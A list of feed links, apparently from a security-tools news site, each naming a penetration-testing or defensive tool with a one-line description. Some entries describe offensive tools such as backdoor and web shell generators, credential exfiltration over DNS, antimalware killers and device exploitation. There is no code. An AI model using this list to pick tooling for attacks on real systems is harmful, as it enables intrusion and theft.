- [EDD - Enumerate Domain Data](http://feedproxy.google.com/~r/PentestTools/~3/yWykr_gYfy0/edd-enumerate-domain-data.html)
- [Owt - The Most Compact WiFi Auditing Tool That Works On Command Line Linux](http://feedproxy.google.com/~r/PentestTools/~3/ardYBcdEwxg/owt-most-compact-wifi-auditing-tool.html)
- [Graphw00F - GraphQL fingerprinting tool for GQL endpoints](http://feedproxy.google.com/~r/PentestTools/~3/5Y8vQjCH630/graphw00f-graphql-fingerprinting-tool.html)
- [SharpStrike - A Post Exploitation Tool Written In C# Uses Either CIM Or WMI To Query Remote Systems](http://feedproxy.google.com/~r/PentestTools/~3/J68_CzliZXY/sharpstrike-post-exploitation-tool.html)
- [TREVORspray - A Featureful Round-Robin SOCKS Proxy And Python O365 Sprayer Based On MSOLSpray Which Uses The Microsoft Graph API](http://feedproxy.google.com/~r/PentestTools/~3/onkb_CV3sJY/trevorspray-featureful-round-robin.html)
- [TIGMINT - OSINT (Open Source Intelligence) GUI Software Framework](http://feedproxy.google.com/~r/PentestTools/~3/0Tm-_o92Lfw/tigmint-osint-open-source-intelligence.html)
- [Penelope - Shell Handler](http://feedproxy.google.com/~r/PentestTools/~3/QnsZG9iNOyU/penelope-shell-handler.html)
- [packetsifterTool - A Tool To Aid Analysts In Sifting Through A Packet Capture (Pcap) To Find Noteworthy Traffic](http://feedproxy.google.com/~r/PentestTools/~3/9Vc2FhZhqLM/packetsiftertool-tool-to-aid-analysts.html)
- [Nettacker - Automated Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/1k-7aSHxgOM/nettacker-automated-penetration-testing.html)
- [Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface](http://feedproxy.google.com/~r/PentestTools/~3/jShzRMiCfeo/ligolo-ng-advanced-yet-simple.html)
- [GoPurple - Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions](http://feedproxy.google.com/~r/PentestTools/~3/HV3PgY89qfw/gopurple-yet-another-shellcode-runner.html)
- [Bugs-feed - A Local Hosted Portal Where You Can Search For The Latest News, Videos, CVEs, Vulnerabilities...](http://feedproxy.google.com/~r/PentestTools/~3/NjE5h6FmU20/bugs-feed-local-hosted-portal-where-you.html)
- [Zuthaka - An Open Source Application Designed To Assist Red-Teaming Efforts, By Simplifying The Task Of Managing Different APTs And Other Post-Exploitation Tools](http://feedproxy.google.com/~r/PentestTools/~3/M1jwxLUQMf0/zuthaka-open-source-application.html)
- [CobaltStrikeParser - Python parser for CobaltStrike Beacon's configuration](http://feedproxy.google.com/~r/PentestTools/~3/DLkBRbrlRNQ/cobaltstrikeparser-python-parser-for.html)
- [MobileAudit - SAST and Malware Analysis for Android Mobile APKs](http://feedproxy.google.com/~r/PentestTools/~3/e9v2Qwc0eu4/mobileaudit-sast-and-malware-analysis.html)
- [KnockOutlook - A Little Tool To Play With Outlook](http://feedproxy.google.com/~r/PentestTools/~3/iDLH5L2UZuA/knockoutlook-little-tool-to-play-with.html)
- [Assless-Chaps - Crack MSCHAPv2 Challenge/Responses Quickly Using A Database Of NT Hashes](http://feedproxy.google.com/~r/PentestTools/~3/-YTusn0Rks8/assless-chaps-crack-mschapv2.html)
- [403Bypasser - Automates The Techniques Used To Circumvent Access Control Restrictions On Target Pages](http://feedproxy.google.com/~r/PentestTools/~3/UL3R5g-HqHA/403bypasser-automates-techniques-used.html)
- [SigFlip - A Tool For Patching Authenticode Signed PE Files (Exe, Dll, Sys ..Etc) Without Invalidating Or Breaking The Existing Signature](http://feedproxy.google.com/~r/PentestTools/~3/aVNf5kjJjMA/sigflip-tool-for-patching-authenticode.html)
- [Fpicker - A Frida-based Fuzzing Suite Supporting Various Modes (Including AFL++ In-Process Fuzzing)](http://feedproxy.google.com/~r/PentestTools/~3/al_FpYF6D0g/fpicker-frida-based-fuzzing-suite.html)
- [Keyhacks - A Repository Which Shows Quick Ways In Which API Keys Leaked By A Bug Bounty Program Can Be Checked To See If They'Re Valid](http://feedproxy.google.com/~r/PentestTools/~3/XNN85kEDGgM/keyhacks-repository-which-shows-quick.html)
- [Reg1c1de - Registry Permission Scanner For Finding Potential Privesc Avenues Within Registry](http://feedproxy.google.com/~r/PentestTools/~3/U8q-dBAlnj0/reg1c1de-registry-permission-scanner.html)
- [Speakeasy - Windows Kernel And User Mode Emulation](http://feedproxy.google.com/~r/PentestTools/~3/D9FQ9jwjf88/speakeasy-windows-kernel-and-user-mode.html)
- [PEzor - Open-Source Shellcode And PE Packer](http://feedproxy.google.com/~r/PentestTools/~3/0-qtKseBaP8/pezor-open-source-shellcode-and-pe.html)
- [MEAT - This Toolkit Aims To Help Forensicators Perform Different Kinds Of Acquisitions On iOS Devices](http://feedproxy.google.com/~r/PentestTools/~3/tBxfj4OX5ww/meat-this-toolkit-aims-to-help.html)
- [Huan - Encrypted PE Loader Generator](http://feedproxy.google.com/~r/PentestTools/~3/3wGj5W9YJvs/huan-encrypted-pe-loader-generator.html)
- [Pantagrule - Large Hashcat Rulesets Generated From Real-World Compromised Passwords](http://feedproxy.google.com/~r/PentestTools/~3/umlUE-7HEXM/pantagrule-large-hashcat-rulesets.html)
- [Ctf-Screenshotter - A CTF Web Challenge About Making Screenshots](http://feedproxy.google.com/~r/PentestTools/~3/4a1bH4q4jso/ctf-screenshotter-ctf-web-challenge.html)
- [adalanche - Active Directory ACL Visualizer and Explorer](http://feedproxy.google.com/~r/PentestTools/~3/3ZwARpBSg6o/adalanche-active-directory-acl.html)
- [BeaconEye - Hunts Out CobaltStrike Beacons And Logs Operator Command Output](http://feedproxy.google.com/~r/PentestTools/~3/oZh9hj1qj9s/beaconeye-hunts-out-cobaltstrike.html)
- [Dorkify - Perform Google Dork Search](http://feedproxy.google.com/~r/PentestTools/~3/LQIlKNPIm-Q/dorkify-perform-google-dork-search.html)
- [SLSA - Supply-chain Levels For Software Artifacts](http://feedproxy.google.com/~r/PentestTools/~3/XTfqwYR_QDU/slsa-supply-chain-levels-for-software.html)
- [PSPKIAudit - PowerShell toolkit for auditing Active Directory Certificate Services (AD CS)](http://feedproxy.google.com/~r/PentestTools/~3/R12aYWFxQWo/pspkiaudit-powershell-toolkit-for.html)
- [DNSMonster - Passive DNS Capture/Monitoring Framework](http://feedproxy.google.com/~r/PentestTools/~3/A7hAzJU8kWs/dnsmonster-passive-dns.html)
- [Git-Secret - Go Scripts For Finding An API Key / Some Keywords In Repository](http://feedproxy.google.com/~r/PentestTools/~3/zIQZFc-S3t0/git-secret-go-scripts-for-finding-api.html)
- [LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files](http://feedproxy.google.com/~r/PentestTools/~3/lHQs5U2wO4Y/lazysign-create-fake-certs-for-binaries.html)
- [Process-Dump - Windows Tool For Dumping Malware PE Files From Memory Back To Disk For Analysis](http://feedproxy.google.com/~r/PentestTools/~3/-cIZrbxL2ds/process-dump-windows-tool-for-dumping.html)
- [Keimpx - Check For Valid Credentials Across A Network Over SMB](http://feedproxy.google.com/~r/PentestTools/~3/Ih24bP9zZoU/keimpx-check-for-valid-credentials.html)
- [SQLancer - Detecting Logic Bugs In DBMS](http://feedproxy.google.com/~r/PentestTools/~3/YNuhBAyT6-0/sqlancer-detecting-logic-bugs-in-dbms.html)
- [XLMMacroDeobfuscator - Extract And Deobfuscate XLM Macros (A.K.A Excel 4.0 Macros)](http://feedproxy.google.com/~r/PentestTools/~3/a1S6tCAs5k0/xlmmacrodeobfuscator-extract-and.html)
- [Brutus - An Educational Exploitation Framework Shipped On A Modular And Highly Extensible Multi-Tasking And Multi-Processing Architecture](http://feedproxy.google.com/~r/PentestTools/~3/cpJ4PKfGYUA/brutus-educational-exploitation.html)
- [PackageDNA - Tool To Analyze Software Packages Of Different Programming Languages That Are Being Or Will Be Used In Their Codes](http://feedproxy.google.com/~r/PentestTools/~3/-d4PufNyJIk/packagedna-tool-to-analyze-software.html)
- [FisherMan - CLI Program That Collects Information From Facebook User Profiles Via Selenium](http://feedproxy.google.com/~r/PentestTools/~3/nUJjKv3m7dw/fisherman-cli-program-that-collects.html)
- [REW-sploit - Emulate And Dissect MSF And *Other* Attacks](http://feedproxy.google.com/~r/PentestTools/~3/GyJX5QzJXDk/rew-sploit-emulate-and-dissect-msf-and.html)
- [Allstar - GitHub App To Set And Enforce Security Policies](http://feedproxy.google.com/~r/PentestTools/~3/PJKJmcnHyWI/allstar-github-app-to-set-and-enforce.html)
- [Jsleak - A Go Code To Detect Leaks In JS Files Via Regex Patterns](http://feedproxy.google.com/~r/PentestTools/~3/nMMZ9f_sz-g/jsleak-go-code-to-detect-leaks-in-js.html)
- [AuraBorealisApp - Do You Know What's In Your Python Packages? A Tool For Visualizing Python Package Registry Security Audit Data](http://feedproxy.google.com/~r/PentestTools/~3/ZiyR-QHv6AI/auraborealisapp-do-you-know-whats-in.html)
- [SGXRay - Automating Vulnerability Detection for SGX Apps](http://feedproxy.google.com/~r/PentestTools/~3/CupjFNIWzxQ/sgxray-automating-vulnerability.html)
- [ReverseSSH - Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such](http://feedproxy.google.com/~r/PentestTools/~3/ynUkWGQqm0Y/reversessh-statically-linked-ssh-server.html)
- [PickleC2 - A Post-Exploitation And Lateral Movements Framework](http://feedproxy.google.com/~r/PentestTools/~3/nsHYXxh_5Z4/picklec2-post-exploitation-and-lateral.html)
- [CamPhish - Grab Cam Shots From Target'S Phone Front Camera Or PC Webcam Just Sending A Link.](http://feedproxy.google.com/~r/PentestTools/~3/9rUpMezlGe0/camphish-grab-cam-shots-from-targets.html)
- [Raider - Web Authentication Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/lAzSIlU68zo/raider-web-authentication-testing.html)
- [Tko-Subs - A Tool That Can Help Detect And Takeover Subdomains With Dead DNS Records](http://feedproxy.google.com/~r/PentestTools/~3/TAgNg2xW_LI/tko-subs-tool-that-can-help-detect-and.html)
- [Bantam - A PHP Backdoor Management And Generation tool/C2 Featuring End To End Encrypted Payload Streaming Designed To Bypass WAF, IDS, SIEM Systems](http://feedproxy.google.com/~r/PentestTools/~3/wZFgmyRBTqI/bantam-php-backdoor-management-and.html)
- [NinjaDroid - Ninja Reverse Engineering On Android APK Packages](http://feedproxy.google.com/~r/PentestTools/~3/A8IxFPEBMBc/ninjadroid-ninja-reverse-engineering-on.html)
- [Nimplant - A Cross-Platform Implant Written In Nim](http://feedproxy.google.com/~r/PentestTools/~3/SLexicZsC_E/nimplant-cross-platform-implant-written.html)
- [jwtXploiter - A Tool To Test Security Of Json Web Token](http://feedproxy.google.com/~r/PentestTools/~3/z5wokfUxlcA/jwtxploiter-tool-to-test-security-of.html)
- [Http-Request-Smuggling - HTTP Request Smuggling Detection Tool](http://feedproxy.google.com/~r/PentestTools/~3/rJ-iTDnBOFY/http-request-smuggling-http-request.html)
- [AlanFramework - A Post-Exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/e7e0GVr9NqM/alanframework-post-exploitation.html)
- [Wsh - Web Shell Generator And Command Line Interface](http://feedproxy.google.com/~r/PentestTools/~3/nHvvlSRCbi8/wsh-web-shell-generator-and-command.html)
- [Jarm - Active Transport Layer Security (TLS) server fingerprinting tool](http://feedproxy.google.com/~r/PentestTools/~3/QEDgheFSUBs/jarm-active-transport-layer-security.html)
- [Karton - Distributed Malware Processing Framework Based On Python, Redis And MinIO](http://feedproxy.google.com/~r/PentestTools/~3/tqyPiwebSI8/karton-distributed-malware-processing.html)
- [UnhookMe - An Universal Windows API Resolver And Unhooker Addressing Problem Of Invoking Unmonitored System Calls From Within Of Your Red Teams Malware](http://feedproxy.google.com/~r/PentestTools/~3/tcLYZ2VAXwU/unhookme-universal-windows-api-resolver.html)
- [ADCSPwn - A Tool To Escalate Privileges In An Active Directory Network By Coercing Authenticate From Machine Accounts And Relaying To The Certificate Service](http://feedproxy.google.com/~r/PentestTools/~3/CYU2JFoH43Q/adcspwn-tool-to-escalate-privileges-in.html)
- [Sigurlfind3R - A Reconnaissance Tool, It Fetches URLs From AlienVault's OTX, Common Crawl, URLScan, Github And The Wayback Machine](http://feedproxy.google.com/~r/PentestTools/~3/GgJFWW9bj9g/sigurlfind3r-reconnaissance-tool-it.html)
- [Php-Jpeg-Injector - Injects Php Payloads Into Jpeg Images](http://feedproxy.google.com/~r/PentestTools/~3/44R1LgwV9f8/php-jpeg-injector-injects-php-payloads.html)
- [Solitude - A Privacy Analysis Tool That Enables Anyone To Conduct Their Own Privacy Investigations](http://feedproxy.google.com/~r/PentestTools/~3/m8O945wUWZA/solitude-privacy-analysis-tool-that.html)
- [Go-Shellcode - A Repository Of Windows Shellcode Runners And Supporting Utilities](http://feedproxy.google.com/~r/PentestTools/~3/88mSKQeHZoE/go-shellcode-repository-of-windows.html)
- [cThreadHijack - Beacon Object File (BOF) For Remote Process Injection Via Thread Hijacking](http://feedproxy.google.com/~r/PentestTools/~3/yCCeRISZ1Ms/cthreadhijack-beacon-object-file-bof.html)
- [TwiTi - Tool for extracting IOCs from tweet](http://feedproxy.google.com/~r/PentestTools/~3/_Q2iZQGADZs/twiti-tool-for-extracting-iocs-from.html)
- [WARCannon - High Speed/Low Cost CommonCrawl RegExp In Node.js](http://feedproxy.google.com/~r/PentestTools/~3/FUFAmzulRD4/warcannon-high-speedlow-cost.html)
- [ChangeTower - Tool To Help You Watch Changes In Webpages And Get Notified Of Any Changes](http://feedproxy.google.com/~r/PentestTools/~3/Dtcj5jMld9c/changetower-tool-to-help-you-watch.html)
- [Elpscrk - An Intelligent Common User-Password Profiler Based On Permutations And Statistics](http://feedproxy.google.com/~r/PentestTools/~3/u4KBGfSmBng/elpscrk-intelligent-common-user.html)
- [Uchihash - A Small Utility To Deal With Malware Embedded Hashes](http://feedproxy.google.com/~r/PentestTools/~3/nWFl1KEI9K0/uchihash-small-utility-to-deal-with.html)
- [SharpLAPS - Retrieve LAPS Password From LDAP](http://feedproxy.google.com/~r/PentestTools/~3/cvxWlTfUAqg/sharplaps-retrieve-laps-password-from.html)
- [Doldrums - A Flutter/Dart Reverse Engineering Tool](http://feedproxy.google.com/~r/PentestTools/~3/b34vQ1uViEk/doldrums-flutterdart-reverse.html)
- [Rz-Ghidra - Deep Ghidra Decompiler And Sleigh Disassembler Integration For Rizin](http://feedproxy.google.com/~r/PentestTools/~3/Gk9o_TApk4o/rz-ghidra-deep-ghidra-decompiler-and.html)
- [Domhttpx - A Google Search Engine Dorker With HTTP Toolkit Built With Python, Can Make It Easier For You To Find Many URLs/IPs At Once With Fast Time](http://feedproxy.google.com/~r/PentestTools/~3/mpCd3BNgduk/domhttpx-google-search-engine-dorker.html)
- [PowerShellArmoury - A PowerShell Armoury For Security Guys And Girls](http://feedproxy.google.com/~r/PentestTools/~3/57kiAzqeCxk/powershellarmoury-powershell-armoury.html)
- [tsharkVM - Tshark + ELK Analytics Virtual Machine](http://feedproxy.google.com/~r/PentestTools/~3/hQwOrWYf8oU/tsharkvm-tshark-elk-analytics-virtual.html)
- [CSIRT-Collect - PowerShell Script To Collect Memory And (Triage) Disk Forensics](http://feedproxy.google.com/~r/PentestTools/~3/-tNVO3wk2pY/csirt-collect-powershell-script-to.html)
- [Cerbrutus - Network Brute Force Tool, Written In Python](http://feedproxy.google.com/~r/PentestTools/~3/DNMByiC7CXE/cerbrutus-network-brute-force-tool.html)
- [Ruse - Mobile Camera-Based Application That Attempts To Alter Photos To Preserve Their Utility To Humans While Making Them Unusable For Facial Recognition Systems](http://feedproxy.google.com/~r/PentestTools/~3/bOKl7xd6tZY/ruse-mobile-camera-based-application.html)
- [LightMe - HTTP Server Serving Obfuscated Powershell Scripts/Payloads](http://feedproxy.google.com/~r/PentestTools/~3/IgFvhKcEi_g/lightme-http-server-serving-obfuscated.html)
- [Rtl_433 - Program To Decode Radio Transmissions From Devices On The ISM Bands (And Other Frequencies)](http://feedproxy.google.com/~r/PentestTools/~3/0QyUY6ElNlw/rtl433-program-to-decode-radio.html)
- [Sniffle - A Sniffer For Bluetooth 5 And 4.X LE](http://feedproxy.google.com/~r/PentestTools/~3/LYmPk9piHyE/sniffle-sniffer-for-bluetooth-5-and-4x.html)
- [Radare2 - UNIX-like Reverse Engineering Framework And Command-Line Toolset](http://feedproxy.google.com/~r/PentestTools/~3/UkZL0g8rh7Y/radare2-unix-like-reverse-engineering.html)
- [CredPhish - A PowerShell Script Designed To Invoke Legitimate Credential Prompts And Exfiltrate Passwords Over DNS](http://feedproxy.google.com/~r/PentestTools/~3/pbm9WI0auMw/credphish-powershell-script-designed-to.html)
- [LoGiC.NET - A More Advanced Free And Open .NET Obfuscator Using Dnlib](http://feedproxy.google.com/~r/PentestTools/~3/hPYtpZ0YOeA/logicnet-more-advanced-free-and-open.html)
- [TokenTactics - Azure JWT Token Manipulation Toolset](http://feedproxy.google.com/~r/PentestTools/~3/lSsXm8DSS6s/tokentactics-azure-jwt-token.html)
- [Reconmap - VAPT (Vulnerability Assessment And Penetration Testing) Automation And Reporting Platform](http://feedproxy.google.com/~r/PentestTools/~3/xscj_lxM0CY/reconmap-vapt-vulnerability-assessment.html)
- [Dorothy - Tool To Test Security Monitoring And Detection For Okta Environments](http://feedproxy.google.com/~r/PentestTools/~3/KdeAFE4lXyg/dorothy-tool-to-test-security.html)
- [Juumla - Tool Designed To Identify And Scan For Version, Config Files In The CMS Joomla!](http://feedproxy.google.com/~r/PentestTools/~3/pecPkeqPvfI/juumla-tool-designed-to-identify-and.html)
- [Rconn - Rconn Is A Multiplatform Program For Creating Generic Reverse Connections](http://feedproxy.google.com/~r/PentestTools/~3/FeyUq-I8_sU/rconn-rconn-is-multiplatform-program.html)
- [Ppmap - A Scanner/Exploitation Tool Written In GO, Which Leverages Prototype Pollution To XSS By Exploiting Known Gadgets](http://feedproxy.google.com/~r/PentestTools/~3/_bFPfV2O_ns/ppmap-scannerexploitation-tool-written.html)
- [Terraguard - Create And Destroy Your Own VPN Service Using WireGuard](http://feedproxy.google.com/~r/PentestTools/~3/LZ0N7_3UGY0/terraguard-create-and-destroy-your-own.html)
- [Pathprober - Probe And Discover HTTP Pathname Using Brute-Force Methodology And Filtered By Specific Word Or 2 Words At Once](http://feedproxy.google.com/~r/PentestTools/~3/1wfxCYHzFBI/pathprober-probe-and-discover-http.html)
- [In0ri - Defacement Detection With Deep Learning](http://feedproxy.google.com/~r/PentestTools/~3/xWTVb5QArRg/in0ri-defacement-detection-with-deep.html)
- [TeamsUserEnum - User Enumeration With Microsoft Teams API](http://feedproxy.google.com/~r/PentestTools/~3/T__cGxdYbG4/teamsuserenum-user-enumeration-with.html)
- [Pstf2 - Passive Security Tools Fingerprinting Framework](http://feedproxy.google.com/~r/PentestTools/~3/InDAg7JN4sc/pstf2-passive-security-tools.html)
- [Beanshooter - JMX Enumeration And Attacking Tool](http://feedproxy.google.com/~r/PentestTools/~3/ffOIq6dDCBM/beanshooter-jmx-enumeration-and.html)
- [Hash-Buster v3.0 - Crack Hashes In Seconds](http://feedproxy.google.com/~r/PentestTools/~3/wy2VigNrEKI/hash-buster-v30-crack-hashes-in-seconds.html)
- [Allsafe - Intentionally Vulnerable Android Application](http://feedproxy.google.com/~r/PentestTools/~3/v6pzEapdvOk/allsafe-intentionally-vulnerable.html)
- [Regexploit - Find Regular Expressions Which Are Vulnerable To ReDoS (Regular Expression Denial Of Service)](http://feedproxy.google.com/~r/PentestTools/~3/KpfO7nmCo80/regexploit-find-regular-expressions.html)
- [MANSPIDER - Spider Entire Networks For Juicy Files Sitting On SMB Shares. Search Filenames Or File Content - Regex Supported!](http://feedproxy.google.com/~r/PentestTools/~3/FlhVlO1EWgI/manspider-spider-entire-networks-for.html)
- [Orbitaldump - A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python](http://feedproxy.google.com/~r/PentestTools/~3/tacqVf8T3X4/orbitaldump-simple-multi-threaded.html)
- [ARTIF - An Advanced Real Time Threat Intelligence Framework To Identify Threats And Malicious Web Traffic On The Basis Of IP Reputation And Historical Data.](http://feedproxy.google.com/~r/PentestTools/~3/MNLYc6zffb8/artif-advanced-real-time-threat.html)
- [DNSStager - Hide Your Payload In DNS](http://feedproxy.google.com/~r/PentestTools/~3/o5RHHZ4WhFI/dnsstager-hide-your-payload-in-dns.html)
- [Cilium - eBPF-based Networking, Security, And Observability](http://feedproxy.google.com/~r/PentestTools/~3/UY91VgCoe8Q/cilium-ebpf-based-networking-security.html)
- [Bughound - Static Code Analysis Tool Based On Elasticsearch](http://feedproxy.google.com/~r/PentestTools/~3/BP7dqA8AGcc/bughound-static-code-analysis-tool.html)
- [Kali-Whoami - A Privacy Tool Developed To Keep You Anonymous On Kali Linux At The Highest Level](http://feedproxy.google.com/~r/PentestTools/~3/43pg-I97vHo/kali-whoami-privacy-tool-developed-to.html)
- [Exploit_Mitigations - Knowledge Base Of Exploit Mitigations Available Across Numerous Operating Systems, Architectures And Applications And Versions](http://feedproxy.google.com/~r/PentestTools/~3/qgbSp8Db2Q8/exploitmitigations-knowledge-base-of.html)
- [Ventoy - A New Bootable USB Solution](http://feedproxy.google.com/~r/PentestTools/~3/yp24AmhB8Aw/ventoy-new-bootable-usb-solution.html)
- [Redteam-Hardware-Toolkit - Red Team Hardware Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/5dIUIQ8MVM4/redteam-hardware-toolkit-red-team.html)
- [Wpscvn - Wpscvn Is A Tool For Pentesters, Website Owner To Test If Their Websites Had Some Vulnerable Plugins Or Themes](http://feedproxy.google.com/~r/PentestTools/~3/-Pd7AMLAcuI/wpscvn-wpscvn-is-tool-for-pentesters.html)
- [Injector - Complete Arsenal Of Memory Injection And Other Techniques For Red-Teaming In Windows](http://feedproxy.google.com/~r/PentestTools/~3/xUfVQo_RTIA/injector-complete-arsenal-of-memory.html)
- [Whisker - A C# Tool For Taking Over Active Directory User And Computer Accounts By Manipulating Their msDS-KeyCredentialLink Attribute](http://feedproxy.google.com/~r/PentestTools/~3/akE7mbfjX3Q/whisker-c-tool-for-taking-over-active.html)
- [DNSrr - A Tool Written In Bash, Used To Enumerate All The Juicy Stuff From DNS](http://feedproxy.google.com/~r/PentestTools/~3/X4PnUfbnHU8/dnsrr-tool-written-in-bash-used-to.html)
- [DcRat - A Simple Remote Tool Written In C#](http://feedproxy.google.com/~r/PentestTools/~3/HOYmuEwfPgE/dcrat-simple-remote-tool-written-in-c.html)
- [Sx - Fast, Modern, Easy-To-Use Network Scanner](http://feedproxy.google.com/~r/PentestTools/~3/cbt10HquvD0/sx-fast-modern-easy-to-use-network.html)
- [RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin](http://feedproxy.google.com/~r/PentestTools/~3/B-yKTJ1Mafc/remotepotato0-just-another-wont-fix.html)
- [JWTweak - Detects The Algorithm Of Input JWT Token And Provide Options To Generate The New JWT Token Based On The User Selected Algorithm](http://feedproxy.google.com/~r/PentestTools/~3/A-tLXNJ9Kac/jwtweak-detects-algorithm-of-input-jwt.html)
- [Nexfil - OSINT Tool For Finding Profiles By Username](http://feedproxy.google.com/~r/PentestTools/~3/DpiGJAzxGsg/nexfil-osint-tool-for-finding-profiles.html)
- [The-Bastion - Authentication, Authorization, Traceability And Auditability For SSH Accesses](http://feedproxy.google.com/~r/PentestTools/~3/ioIqn_vllHE/the-bastion-authentication.html)
- [Security Scorecards - Security Health Metrics For Open Source](http://feedproxy.google.com/~r/PentestTools/~3/qbMhF4J-_lo/security-scorecards-security-health.html)
- [WFH - Windows Feature Hunter](http://feedproxy.google.com/~r/PentestTools/~3/SQlTN40vWHU/wfh-windows-feature-hunter.html)
- [Ipa-Medit - Memory Search And Patch Tool For Resigned Ipa Without Jailbreak](http://feedproxy.google.com/~r/PentestTools/~3/nyDDBtriVZI/ipa-medit-memory-search-and-patch-tool.html)
- [Cariddi - Take A List Of Domains, Crawl Urls And Scan For Endpoints, Secrets, Api Keys, File Extensions, Tokens And More...](http://feedproxy.google.com/~r/PentestTools/~3/p87M-KAS3hw/cariddi-take-list-of-domains-crawl-urls.html)
- [FindObjects-BOF - A Cobalt Strike Beacon Object File (BOF) Project Which Uses Direct System Calls To Enumerate Processes For Specific Loaded Modules Or Process Handles](http://feedproxy.google.com/~r/PentestTools/~3/Aq3D_1pzG1Q/findobjects-bof-cobalt-strike-beacon.html)
- [GitDump - A Pentesting Tool That Dumps The Source Code From .Git Even When The Directory Traversal Is Disabled](http://feedproxy.google.com/~r/PentestTools/~3/OO1BR8qNc6E/gitdump-pentesting-tool-that-dumps.html)
- [Sharperner - Simple Executable Generator With Encrypted Shellcode](http://feedproxy.google.com/~r/PentestTools/~3/WMaqPdZ6KMA/sharperner-simple-executable-generator.html)
- [TiEtwAgent - PoC Memory Injection Detection Agent Based On ETW, For Offensive And Defensive Research Purposes](http://feedproxy.google.com/~r/PentestTools/~3/ry80zXpWkdM/tietwagent-poc-memory-injection.html)
- [Salus - Security Scanner Coordinator](http://feedproxy.google.com/~r/PentestTools/~3/FuuTjUbl4e4/salus-security-scanner-coordinator.html)
- [Backstab - A Tool To Kill Antimalware Protected Processes](http://feedproxy.google.com/~r/PentestTools/~3/MEAZhBGl6zs/backstab-tool-to-kill-antimalware.html)
- [Scour - AWS Exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/N65Y8JPyNpI/scour-aws-exploitation-framework.html)
- [FRIDA-DEXDump - Fast Search And Dump Dex On Memory](http://feedproxy.google.com/~r/PentestTools/~3/PopMEkBIBlE/frida-dexdump-fast-search-and-dump-dex.html)
- [MacHound - An extension to audit Bloodhound collecting and ingesting of Active Directory relationships on MacOS hosts](http://feedproxy.google.com/~r/PentestTools/~3/s3J3uHpNuVI/machound-extension-to-audit-bloodhound.html)
- [GDir-Thief - Red Team Tool For Exfiltrating The Target Organization'S Google People Directory That You Have Access To, Via Google's API](http://feedproxy.google.com/~r/PentestTools/~3/G5ziMMlZrmI/gdir-thief-red-team-tool-for.html)
- [Gorsair - Hacks Its Way Into Remote Docker Containers That Expose Their APIs](http://feedproxy.google.com/~r/PentestTools/~3/bxk9oLQ0gRc/gorsair-hacks-its-way-into-remote.html)
- [Lazyrecon - Tool To Automate Your Reconnaissance Process In An Organized Fashion](http://feedproxy.google.com/~r/PentestTools/~3/QZUTPr8ozH8/lazyrecon-tool-to-automate-your.html)
- [Invoke-DNSteal - Simple And Customizable DNS Data Exfiltrator](http://feedproxy.google.com/~r/PentestTools/~3/JPrjm56IZhA/invoke-dnsteal-simple-and-customizable.html)
- [OpenAttack - An Open-Source Package For Textual Adversarial Attack](http://feedproxy.google.com/~r/PentestTools/~3/2ZyabkNMJZE/openattack-open-source-package-for.html)
- [Red-Shadow - Lightspin AWS IAM Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/Qg8DAKSbwN0/red-shadow-lightspin-aws-iam.html)
- [Forblaze - A Python Mac Steganography Payload Generator](http://feedproxy.google.com/~r/PentestTools/~3/NJrbxqltUWM/forblaze-python-mac-steganography.html)
- [S3-Account-Search - S3 Account Search](http://feedproxy.google.com/~r/PentestTools/~3/4J_MWmuGVqk/s3-account-search-s3-account-search.html)
- [WAF-A-MoLE - A Guided Mutation-Based Fuzzer For ML-based Web Application Firewalls](http://feedproxy.google.com/~r/PentestTools/~3/CzrPAKHtrDo/waf-mole-guided-mutation-based-fuzzer.html)
- [AWS Pen-Testing Laboratory - Pentesting Lab With A Kali Linux Instance Accessible Via Ssh And Wireguard VPN And With Vulnerable Instances In A Private Subnet](http://feedproxy.google.com/~r/PentestTools/~3/67jcw6D5d0s/aws-pen-testing-laboratory-pentesting.html)
- [Heappy - A Happy Heap Editor To Support Your Exploitation Process](http://feedproxy.google.com/~r/PentestTools/~3/xPF3ju1Jc_o/heappy-happy-heap-editor-to-support.html)
- [Mythic - A Collaborative, Multi-Platform, Red Teaming Framework](http://feedproxy.google.com/~r/PentestTools/~3/6IO_l1DVBmI/mythic-collaborative-multi-platform-red.html)
- [HoneyCreds - Network Credential Injection To Detect Responder And Other Network Poisoners](http://feedproxy.google.com/~r/PentestTools/~3/Huw9_NtLQX8/honeycreds-network-credential-injection.html)
- [SharpHook - Tool Tath Uses Various API Hooks In Order To Give Us The Desired Credentials](http://feedproxy.google.com/~r/PentestTools/~3/zcNJHbadNwk/sharphook-tool-tath-uses-various-api.html)
- [CamRaptor - Tool That Exploits Several Vulnerabilities In Popular DVR Cameras To Obtain Network Camera Credentials](http://feedproxy.google.com/~r/PentestTools/~3/6P3t-SmQROA/camraptor-tool-that-exploits-several.html)
- [BlobHunter - Find Exposed Data In Azure With This Public Blob Scanner](http://feedproxy.google.com/~r/PentestTools/~3/LfLgsUm7ixA/blobhunter-find-exposed-data-in-azure.html)
- [RomBuster - A Router Exploitation Tool That Allows To Disclosure Network Router Admin Password](http://feedproxy.google.com/~r/PentestTools/~3/6YXGCGm72E8/rombuster-router-exploitation-tool-that.html)
- [Fully-Homomorphic-Encryption - Libraries And Tools To Perform Fully Homomorphic Encryption Operations On An Encrypted Data Set](http://feedproxy.google.com/~r/PentestTools/~3/NwhFFOomloI/fully-homomorphic-encryption-libraries.html)
- [Shreder - A Powerful Multi-Threaded SSH Protocol Password Bruteforce Tool](http://feedproxy.google.com/~r/PentestTools/~3/sr8OUq5bZeg/shreder-powerful-multi-threaded-ssh.html)
- [DarkLoadLibrary - LoadLibrary For Offensive Operations](http://feedproxy.google.com/~r/PentestTools/~3/77LyWsRlkqk/darkloadlibrary-loadlibrary-for.html)
- [CamOver - A Camera Exploitation Tool That Allows To Disclosure Network Camera Admin Password](http://feedproxy.google.com/~r/PentestTools/~3/Zkw_7YuXcXk/camover-camera-exploitation-tool-that.html)
